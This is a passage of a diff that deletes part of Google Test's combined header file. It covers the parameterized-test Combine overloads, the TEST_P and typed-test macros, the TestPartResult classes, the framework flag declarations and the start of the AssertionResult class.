-template <typename Generator1, typename Generator2, typename Generator3>
-internal::CartesianProductHolder3<Generator1, Generator2, Generator3> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3) {
-  return internal::CartesianProductHolder3<Generator1, Generator2, Generator3>(
-      g1, g2, g3);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4>
-internal::CartesianProductHolder4<Generator1, Generator2, Generator3,
-    Generator4> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4) {
-  return internal::CartesianProductHolder4<Generator1, Generator2, Generator3,
-      Generator4>(
-      g1, g2, g3, g4);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5>
-internal::CartesianProductHolder5<Generator1, Generator2, Generator3,
-    Generator4, Generator5> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5) {
-  return internal::CartesianProductHolder5<Generator1, Generator2, Generator3,
-      Generator4, Generator5>(
-      g1, g2, g3, g4, g5);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6>
-internal::CartesianProductHolder6<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6) {
-  return internal::CartesianProductHolder6<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6>(
-      g1, g2, g3, g4, g5, g6);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7>
-internal::CartesianProductHolder7<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7) {
-  return internal::CartesianProductHolder7<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7>(
-      g1, g2, g3, g4, g5, g6, g7);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7, typename Generator8>
-internal::CartesianProductHolder8<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7, Generator8> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7, const Generator8& g8) {
-  return internal::CartesianProductHolder8<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7, Generator8>(
-      g1, g2, g3, g4, g5, g6, g7, g8);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7, typename Generator8, typename Generator9>
-internal::CartesianProductHolder9<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7, Generator8,
-    Generator9> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7, const Generator8& g8, const Generator9& g9) {
-  return internal::CartesianProductHolder9<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7, Generator8, Generator9>(
-      g1, g2, g3, g4, g5, g6, g7, g8, g9);
-}
-
-template <typename Generator1, typename Generator2, typename Generator3,
-    typename Generator4, typename Generator5, typename Generator6,
-    typename Generator7, typename Generator8, typename Generator9,
-    typename Generator10>
-internal::CartesianProductHolder10<Generator1, Generator2, Generator3,
-    Generator4, Generator5, Generator6, Generator7, Generator8, Generator9,
-    Generator10> Combine(
-    const Generator1& g1, const Generator2& g2, const Generator3& g3,
-        const Generator4& g4, const Generator5& g5, const Generator6& g6,
-        const Generator7& g7, const Generator8& g8, const Generator9& g9,
-        const Generator10& g10) {
-  return internal::CartesianProductHolder10<Generator1, Generator2, Generator3,
-      Generator4, Generator5, Generator6, Generator7, Generator8, Generator9,
-      Generator10>(
-      g1, g2, g3, g4, g5, g6, g7, g8, g9, g10);
-}
-# endif  // GTEST_HAS_COMBINE
-
-
-
-# define TEST_P(test_case_name, test_name) \
-  class GTEST_TEST_CLASS_NAME_(test_case_name, test_name) \
-      : public test_case_name { \
-   public: \
-    GTEST_TEST_CLASS_NAME_(test_case_name, test_name)() {} \
-    virtual void TestBody(); \
-   private: \
-    static int AddToRegistry() { \
-      ::testing::UnitTest::GetInstance()->parameterized_test_registry(). \
-          GetTestCasePatternHolder<test_case_name>(\
-              #test_case_name, __FILE__, __LINE__)->AddTestPattern(\
-                  #test_case_name, \
-                  #test_name, \
-                  new ::testing::internal::TestMetaFactory< \
-                      GTEST_TEST_CLASS_NAME_(test_case_name, test_name)>()); \
-      return 0; \
-    } \
-    static int gtest_registering_dummy_ GTEST_ATTRIBUTE_UNUSED_; \
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(\
-        GTEST_TEST_CLASS_NAME_(test_case_name, test_name)); \
-  }; \
-  int GTEST_TEST_CLASS_NAME_(test_case_name, \
-                             test_name)::gtest_registering_dummy_ = \
-      GTEST_TEST_CLASS_NAME_(test_case_name, test_name)::AddToRegistry(); \
-  void GTEST_TEST_CLASS_NAME_(test_case_name, test_name)::TestBody()
-
-# define INSTANTIATE_TEST_CASE_P(prefix, test_case_name, generator) \
-  ::testing::internal::ParamGenerator<test_case_name::ParamType> \
-      gtest_##prefix##test_case_name##_EvalGenerator_() { return generator; } \
-  int gtest_##prefix##test_case_name##_dummy_ = \
-      ::testing::UnitTest::GetInstance()->parameterized_test_registry(). \
-          GetTestCasePatternHolder<test_case_name>(\
-              #test_case_name, __FILE__, __LINE__)->AddTestCaseInstantiation(\
-                  #prefix, \
-                  &gtest_##prefix##test_case_name##_EvalGenerator_, \
-                  __FILE__, __LINE__)
-
-}  // namespace testing
-
-#endif  // GTEST_HAS_PARAM_TEST
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PARAM_TEST_H_
-// Copyright 2006, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// Google C++ Testing Framework definitions useful in production code.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PROD_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PROD_H_
-
-// When you need to test the private or protected members of a class,
-// use the FRIEND_TEST macro to declare your tests as friends of the
-// class.  For example:
-//
-// class MyClass {
-//  private:
-//   void MyMethod();
-//   FRIEND_TEST(MyClassTest, MyMethod);
-// };
-//
-// class MyClassTest : public testing::Test {
-//   // ...
-// };
-//
-// TEST_F(MyClassTest, MyMethod) {
-//   // Can call MyClass::MyMethod() here.
-// }
-
-#define FRIEND_TEST(test_case_name, test_name)\
-friend class test_case_name##_##test_name##_Test
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PROD_H_
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: mheule@google.com (Markus Heule)
-//
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_TEST_PART_H_
-#define GTEST_INCLUDE_GTEST_GTEST_TEST_PART_H_
-
-#include <iosfwd>
-#include <vector>
-
-namespace testing {
-
-// A copyable object representing the result of a test part (i.e. an
-// assertion or an explicit FAIL(), ADD_FAILURE(), or SUCCESS()).
-//
-// Don't inherit from TestPartResult as its destructor is not virtual.
-class GTEST_API_ TestPartResult {
- public:
-  // The possible outcomes of a test part (i.e. an assertion or an
-  // explicit SUCCEED(), FAIL(), or ADD_FAILURE()).
-  enum Type {
-    kSuccess,          // Succeeded.
-    kNonFatalFailure,  // Failed but the test can continue.
-    kFatalFailure      // Failed and the test should be terminated.
-  };
-
-  // C'tor.  TestPartResult does NOT have a default constructor.
-  // Always use this constructor (with parameters) to create a
-  // TestPartResult object.
-  TestPartResult(Type a_type,
-                 const char* a_file_name,
-                 int a_line_number,
-                 const char* a_message)
-      : type_(a_type),
-        file_name_(a_file_name == NULL ? "" : a_file_name),
-        line_number_(a_line_number),
-        summary_(ExtractSummary(a_message)),
-        message_(a_message) {
-  }
-
-  // Gets the outcome of the test part.
-  Type type() const { return type_; }
-
-  // Gets the name of the source file where the test part took place, or
-  // NULL if it's unknown.
-  const char* file_name() const {
-    return file_name_.empty() ? NULL : file_name_.c_str();
-  }
-
-  // Gets the line in the source file where the test part took place,
-  // or -1 if it's unknown.
-  int line_number() const { return line_number_; }
-
-  // Gets the summary of the failure message.
-  const char* summary() const { return summary_.c_str(); }
-
-  // Gets the message associated with the test part.
-  const char* message() const { return message_.c_str(); }
-
-  // Returns true iff the test part passed.
-  bool passed() const { return type_ == kSuccess; }
-
-  // Returns true iff the test part failed.
-  bool failed() const { return type_ != kSuccess; }
-
-  // Returns true iff the test part non-fatally failed.
-  bool nonfatally_failed() const { return type_ == kNonFatalFailure; }
-
-  // Returns true iff the test part fatally failed.
-  bool fatally_failed() const { return type_ == kFatalFailure; }
-
- private:
-  Type type_;
-
-  // Gets the summary of the failure message by omitting the stack
-  // trace in it.
-  static std::string ExtractSummary(const char* message);
-
-  // The name of the source file where the test part took place, or
-  // "" if the source file is unknown.
-  std::string file_name_;
-  // The line in the source file where the test part took place, or -1
-  // if the line number is unknown.
-  int line_number_;
-  std::string summary_;  // The test failure summary.
-  std::string message_;  // The test failure message.
-};
-
-// Prints a TestPartResult object.
-std::ostream& operator<<(std::ostream& os, const TestPartResult& result);
-
-// An array of TestPartResult objects.
-//
-// Don't inherit from TestPartResultArray as its destructor is not
-// virtual.
-class GTEST_API_ TestPartResultArray {
- public:
-  TestPartResultArray() {}
-
-  // Appends the given TestPartResult to the array.
-  void Append(const TestPartResult& result);
-
-  // Returns the TestPartResult at the given index (0-based).
-  const TestPartResult& GetTestPartResult(int index) const;
-
-  // Returns the number of TestPartResult objects in the array.
-  int size() const;
-
- private:
-  std::vector<TestPartResult> array_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestPartResultArray);
-};
-
-// This interface knows how to report a test part result.
-class TestPartResultReporterInterface {
- public:
-  virtual ~TestPartResultReporterInterface() {}
-
-  virtual void ReportTestPartResult(const TestPartResult& result) = 0;
-};
-
-namespace internal {
-
-// This helper class is used by {ASSERT|EXPECT}_NO_FATAL_FAILURE to check if a
-// statement generates new fatal failures. To do so it registers itself as the
-// current test part result reporter. Besides checking if fatal failures were
-// reported, it only delegates the reporting to the former result reporter.
-// The original result reporter is restored in the destructor.
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-class GTEST_API_ HasNewFatalFailureHelper
-    : public TestPartResultReporterInterface {
- public:
-  HasNewFatalFailureHelper();
-  virtual ~HasNewFatalFailureHelper();
-  virtual void ReportTestPartResult(const TestPartResult& result);
-  bool has_new_fatal_failure() const { return has_new_fatal_failure_; }
- private:
-  bool has_new_fatal_failure_;
-  TestPartResultReporterInterface* original_reporter_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(HasNewFatalFailureHelper);
-};
-
-}  // namespace internal
-
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_TEST_PART_H_
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_TYPED_TEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_TYPED_TEST_H_
-
-// This header implements typed tests and type-parameterized tests.
-
-// Typed (aka type-driven) tests repeat the same test for types in a
-// list.  You must know which types you want to test with when writing
-// typed tests. Here's how you do it:
-
-#if 0
-
-// First, define a fixture class template.  It should be parameterized
-// by a type.  Remember to derive it from testing::Test.
-template <typename T>
-class FooTest : public testing::Test {
- public:
-  ...
-  typedef std::list<T> List;
-  static T shared_;
-  T value_;
-};
-
-// Next, associate a list of types with the test case, which will be
-// repeated for each type in the list.  The typedef is necessary for
-// the macro to parse correctly.
-typedef testing::Types<char, int, unsigned int> MyTypes;
-TYPED_TEST_CASE(FooTest, MyTypes);
-
-// If the type list contains only one type, you can write that type
-// directly without Types<...>:
-//   TYPED_TEST_CASE(FooTest, int);
-
-// Then, use TYPED_TEST() instead of TEST_F() to define as many typed
-// tests for this test case as you want.
-TYPED_TEST(FooTest, DoesBlah) {
-  // Inside a test, refer to TypeParam to get the type parameter.
-  // Since we are inside a derived class template, C++ requires use to
-  // visit the members of FooTest via 'this'.
-  TypeParam n = this->value_;
-
-  // To visit static members of the fixture, add the TestFixture::
-  // prefix.
-  n += TestFixture::shared_;
-
-  // To refer to typedefs in the fixture, add the "typename
-  // TestFixture::" prefix.
-  typename TestFixture::List values;
-  values.push_back(n);
-  ...
-}
-
-TYPED_TEST(FooTest, HasPropertyA) { ... }
-
-#endif  // 0
-
-// Type-parameterized tests are abstract test patterns parameterized
-// by a type.  Compared with typed tests, type-parameterized tests
-// allow you to define the test pattern without knowing what the type
-// parameters are.  The defined pattern can be instantiated with
-// different types any number of times, in any number of translation
-// units.
-//
-// If you are designing an interface or concept, you can define a
-// suite of type-parameterized tests to verify properties that any
-// valid implementation of the interface/concept should have.  Then,
-// each implementation can easily instantiate the test suite to verify
-// that it conforms to the requirements, without having to write
-// similar tests repeatedly.  Here's an example:
-
-#if 0
-
-// First, define a fixture class template.  It should be parameterized
-// by a type.  Remember to derive it from testing::Test.
-template <typename T>
-class FooTest : public testing::Test {
-  ...
-};
-
-// Next, declare that you will define a type-parameterized test case
-// (the _P suffix is for "parameterized" or "pattern", whichever you
-// prefer):
-TYPED_TEST_CASE_P(FooTest);
-
-// Then, use TYPED_TEST_P() to define as many type-parameterized tests
-// for this type-parameterized test case as you want.
-TYPED_TEST_P(FooTest, DoesBlah) {
-  // Inside a test, refer to TypeParam to get the type parameter.
-  TypeParam n = 0;
-  ...
-}
-
-TYPED_TEST_P(FooTest, HasPropertyA) { ... }
-
-// Now the tricky part: you need to register all test patterns before
-// you can instantiate them.  The first argument of the macro is the
-// test case name; the rest are the names of the tests in this test
-// case.
-REGISTER_TYPED_TEST_CASE_P(FooTest,
-                           DoesBlah, HasPropertyA);
-
-// Finally, you are free to instantiate the pattern with the types you
-// want.  If you put the above code in a header file, you can #include
-// it in multiple C++ source files and instantiate it multiple times.
-//
-// To distinguish different instances of the pattern, the first
-// argument to the INSTANTIATE_* macro is a prefix that will be added
-// to the actual test case name.  Remember to pick unique prefixes for
-// different instances.
-typedef testing::Types<char, int, unsigned int> MyTypes;
-INSTANTIATE_TYPED_TEST_CASE_P(My, FooTest, MyTypes);
-
-// If the type list contains only one type, you can write that type
-// directly without Types<...>:
-//   INSTANTIATE_TYPED_TEST_CASE_P(My, FooTest, int);
-
-#endif  // 0
-
-
-// Implements typed tests.
-
-#if GTEST_HAS_TYPED_TEST
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Expands to the name of the typedef for the type parameters of the
-// given test case.
-# define GTEST_TYPE_PARAMS_(TestCaseName) gtest_type_params_##TestCaseName##_
-
-// The 'Types' template argument below must have spaces around it
-// since some compilers may choke on '>>' when passing a template
-// instance (e.g. Types<int>)
-# define TYPED_TEST_CASE(CaseName, Types) \
-  typedef ::testing::internal::TypeList< Types >::type \
-      GTEST_TYPE_PARAMS_(CaseName)
-
-# define TYPED_TEST(CaseName, TestName) \
-  template <typename gtest_TypeParam_> \
-  class GTEST_TEST_CLASS_NAME_(CaseName, TestName) \
-      : public CaseName<gtest_TypeParam_> { \
-   private: \
-    typedef CaseName<gtest_TypeParam_> TestFixture; \
-    typedef gtest_TypeParam_ TypeParam; \
-    virtual void TestBody(); \
-  }; \
-  bool gtest_##CaseName##_##TestName##_registered_ GTEST_ATTRIBUTE_UNUSED_ = \
-      ::testing::internal::TypeParameterizedTest< \
-          CaseName, \
-          ::testing::internal::TemplateSel< \
-              GTEST_TEST_CLASS_NAME_(CaseName, TestName)>, \
-          GTEST_TYPE_PARAMS_(CaseName)>::Register(\
-              "", #CaseName, #TestName, 0); \
-  template <typename gtest_TypeParam_> \
-  void GTEST_TEST_CLASS_NAME_(CaseName, TestName)<gtest_TypeParam_>::TestBody()
-
-#endif  // GTEST_HAS_TYPED_TEST
-
-// Implements type-parameterized tests.
-
-#if GTEST_HAS_TYPED_TEST_P
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Expands to the namespace name that the type-parameterized tests for
-// the given type-parameterized test case are defined in.  The exact
-// name of the namespace is subject to change without notice.
-# define GTEST_CASE_NAMESPACE_(TestCaseName) \
-  gtest_case_##TestCaseName##_
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Expands to the name of the variable used to remember the names of
-// the defined tests in the given test case.
-# define GTEST_TYPED_TEST_CASE_P_STATE_(TestCaseName) \
-  gtest_typed_test_case_p_state_##TestCaseName##_
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE DIRECTLY.
-//
-// Expands to the name of the variable used to remember the names of
-// the registered tests in the given test case.
-# define GTEST_REGISTERED_TEST_NAMES_(TestCaseName) \
-  gtest_registered_test_names_##TestCaseName##_
-
-// The variables defined in the type-parameterized test macros are
-// static as typically these macros are used in a .h file that can be
-// #included in multiple translation units linked together.
-# define TYPED_TEST_CASE_P(CaseName) \
-  static ::testing::internal::TypedTestCasePState \
-      GTEST_TYPED_TEST_CASE_P_STATE_(CaseName)
-
-# define TYPED_TEST_P(CaseName, TestName) \
-  namespace GTEST_CASE_NAMESPACE_(CaseName) { \
-  template <typename gtest_TypeParam_> \
-  class TestName : public CaseName<gtest_TypeParam_> { \
-   private: \
-    typedef CaseName<gtest_TypeParam_> TestFixture; \
-    typedef gtest_TypeParam_ TypeParam; \
-    virtual void TestBody(); \
-  }; \
-  static bool gtest_##TestName##_defined_ GTEST_ATTRIBUTE_UNUSED_ = \
-      GTEST_TYPED_TEST_CASE_P_STATE_(CaseName).AddTestName(\
-          __FILE__, __LINE__, #CaseName, #TestName); \
-  } \
-  template <typename gtest_TypeParam_> \
-  void GTEST_CASE_NAMESPACE_(CaseName)::TestName<gtest_TypeParam_>::TestBody()
-
-# define REGISTER_TYPED_TEST_CASE_P(CaseName, ...) \
-  namespace GTEST_CASE_NAMESPACE_(CaseName) { \
-  typedef ::testing::internal::Templates<__VA_ARGS__>::type gtest_AllTests_; \
-  } \
-  static const char* const GTEST_REGISTERED_TEST_NAMES_(CaseName) = \
-      GTEST_TYPED_TEST_CASE_P_STATE_(CaseName).VerifyRegisteredTestNames(\
-          __FILE__, __LINE__, #__VA_ARGS__)
-
-// The 'Types' template argument below must have spaces around it
-// since some compilers may choke on '>>' when passing a template
-// instance (e.g. Types<int>)
-# define INSTANTIATE_TYPED_TEST_CASE_P(Prefix, CaseName, Types) \
-  bool gtest_##Prefix##_##CaseName GTEST_ATTRIBUTE_UNUSED_ = \
-      ::testing::internal::TypeParameterizedTestCase<CaseName, \
-          GTEST_CASE_NAMESPACE_(CaseName)::gtest_AllTests_, \
-          ::testing::internal::TypeList< Types >::type>::Register(\
-              #Prefix, #CaseName, GTEST_REGISTERED_TEST_NAMES_(CaseName))
-
-#endif  // GTEST_HAS_TYPED_TEST_P
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_TYPED_TEST_H_
-
-// Depending on the platform, different string classes are available.
-// On Linux, in addition to ::std::string, Google also makes use of
-// class ::string, which has the same interface as ::std::string, but
-// has a different implementation.
-//
-// You can define GTEST_HAS_GLOBAL_STRING to 1 to indicate that
-// ::string is available AND is a distinct type to ::std::string, or
-// define it to 0 to indicate otherwise.
-//
-// If ::std::string and ::string are the same class on your platform
-// due to aliasing, you should define GTEST_HAS_GLOBAL_STRING to 0.
-//
-// If you do not define GTEST_HAS_GLOBAL_STRING, it is defined
-// heuristically.
-
-namespace testing {
-
-// Declares the flags.
-
-// This flag temporary enables the disabled tests.
-GTEST_DECLARE_bool_(also_run_disabled_tests);
-
-// This flag brings the debugger on an assertion failure.
-GTEST_DECLARE_bool_(break_on_failure);
-
-// This flag controls whether Google Test catches all test-thrown exceptions
-// and logs them as failures.
-GTEST_DECLARE_bool_(catch_exceptions);
-
-// This flag enables using colors in terminal output. Available values are
-// "yes" to enable colors, "no" (disable colors), or "auto" (the default)
-// to let Google Test decide.
-GTEST_DECLARE_string_(color);
-
-// This flag sets up the filter to select by name using a glob pattern
-// the tests to run. If the filter is not given all tests are executed.
-GTEST_DECLARE_string_(filter);
-
-// This flag causes the Google Test to list tests. None of the tests listed
-// are actually run if the flag is provided.
-GTEST_DECLARE_bool_(list_tests);
-
-// This flag controls whether Google Test emits a detailed XML report to a file
-// in addition to its normal textual output.
-GTEST_DECLARE_string_(output);
-
-// This flags control whether Google Test prints the elapsed time for each
-// test.
-GTEST_DECLARE_bool_(print_time);
-
-// This flag specifies the random number seed.
-GTEST_DECLARE_int32_(random_seed);
-
-// This flag sets how many times the tests are repeated. The default value
-// is 1. If the value is -1 the tests are repeating forever.
-GTEST_DECLARE_int32_(repeat);
-
-// This flag controls whether Google Test includes Google Test internal
-// stack frames in failure stack traces.
-GTEST_DECLARE_bool_(show_internal_stack_frames);
-
-// When this flag is specified, tests' order is randomized on every iteration.
-GTEST_DECLARE_bool_(shuffle);
-
-// This flag specifies the maximum number of stack frames to be
-// printed in a failure message.
-GTEST_DECLARE_int32_(stack_trace_depth);
-
-// When this flag is specified, a failed assertion will throw an
-// exception if exceptions are enabled, or exit the program with a
-// non-zero code otherwise.
-GTEST_DECLARE_bool_(throw_on_failure);
-
-// When this flag is set with a "host:port" string, on supported
-// platforms test results are streamed to the specified port on
-// the specified host machine.
-GTEST_DECLARE_string_(stream_result_to);
-
-// The upper limit for valid stack trace depths.
-const int kMaxStackTraceDepth = 100;
-
-namespace internal {
-
-class AssertHelper;
-class DefaultGlobalTestPartResultReporter;
-class ExecDeathTest;
-class NoExecDeathTest;
-class FinalSuccessChecker;
-class GTestFlagSaver;
-class StreamingListenerTest;
-class TestResultAccessor;
-class TestEventListenersAccessor;
-class TestEventRepeater;
-class UnitTestRecordPropertyTestHelper;
-class WindowsDeathTest;
-class UnitTestImpl* GetUnitTestImpl();
-void ReportFailureInUnknownLocation(TestPartResult::Type result_type,
-                                    const std::string& message);
-
-}  // namespace internal
-
-// The friend relationship of some of these classes is cyclic.
-// If we don't forward declare them the compiler might confuse the classes
-// in friendship clauses with same named classes on the scope.
-class Test;
-class TestCase;
-class TestInfo;
-class UnitTest;
-
-// A class for indicating whether an assertion was successful.  When
-// the assertion wasn't successful, the AssertionResult object
-// remembers a non-empty message that describes how it failed.
-//
-// To create an instance of this class, use one of the factory functions
-// (AssertionSuccess() and AssertionFailure()).
-//
-// This class is useful for two purposes:
-//   1. Defining predicate functions to be used with Boolean test assertions
-//      EXPECT_TRUE/EXPECT_FALSE and their ASSERT_ counterparts
-//   2. Defining predicate-format functions to be
-//      used with predicate assertions (ASSERT_PRED_FORMAT*, etc).
-//
-// For example, if you define IsEven predicate:
-//
-//   testing::AssertionResult IsEven(int n) {
-//     if ((n % 2) == 0)
-//       return testing::AssertionSuccess();
-//     else
-//       return testing::AssertionFailure() << n << " is odd";
-//   }
-//
-// Then the failed expectation EXPECT_TRUE(IsEven(Fib(5)))
-// will print the message
-//
-//   Value of: IsEven(Fib(5))
-//     Actual: false (5 is odd)
-//   Expected: true
-//
-// instead of a more opaque
-//
-//   Value of: IsEven(Fib(5))
-//     Actual: false
-//   Expected: true
-//
-// in case IsEven is a simple Boolean predicate.
-//
-// If you expect your predicate to be reused and want to support informative
-// messages in EXPECT_FALSE and ASSERT_FALSE (negative assertions show up
-// about half as often as positive ones in our tests), supply messages for
-// both success and failure cases:
-//
-//   testing::AssertionResult IsEven(int n) {
-//     if ((n % 2) == 0)
-//       return testing::AssertionSuccess() << n << " is even";
-//     else
-//       return testing::AssertionFailure() << n << " is odd";
-//   }
-//
-// Then a statement EXPECT_FALSE(IsEven(Fib(6))) will print
-//
-//   Value of: IsEven(Fib(6))
-//     Actual: true (8 is even)
-//   Expected: false
-//
-// NB: Predicates that support negative Boolean assertions have reduced
-// performance in positive ones so be careful not to use them in tests
-// that have lots (tens of thousands) of positive Boolean assertions.
-//
-// To use this class with EXPECT_PRED_FORMAT assertions such as:
-//
-//   // Verifies that Foo() returns an even number.
-//   EXPECT_PRED_FORMAT1(IsEven, Foo());
-//
-// you need to define:
-//
-//   testing::AssertionResult IsEven(const char* expr, int n) {
-//     if ((n % 2) == 0)
-//       return testing::AssertionSuccess();
-//     else
-//       return testing::AssertionFailure()
-//         << "Expected: " << expr << " is even\n  Actual: it's " << n;
-//   }
-//
-// If Foo() returns 5, you will see the following message:
-//
-//   Expected: Foo() is even
-//     Actual: it's 5
-//
-class GTEST_API_ AssertionResult {
- public:
-  // Copy constructor.
-  // Used in EXPECT_TRUE/FALSE(assertion_result).
-  AssertionResult(const AssertionResult& other);
-
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4800 /* forcing value to bool */)
-
-  // Used in the EXPECT_TRUE/FALSE(bool_expression).
-  //
-  // T must be contextually convertible to bool.
-  //
-  // The second parameter prevents this overload from being considered if
-  // the argument is implicitly convertible to AssertionResult. In that case
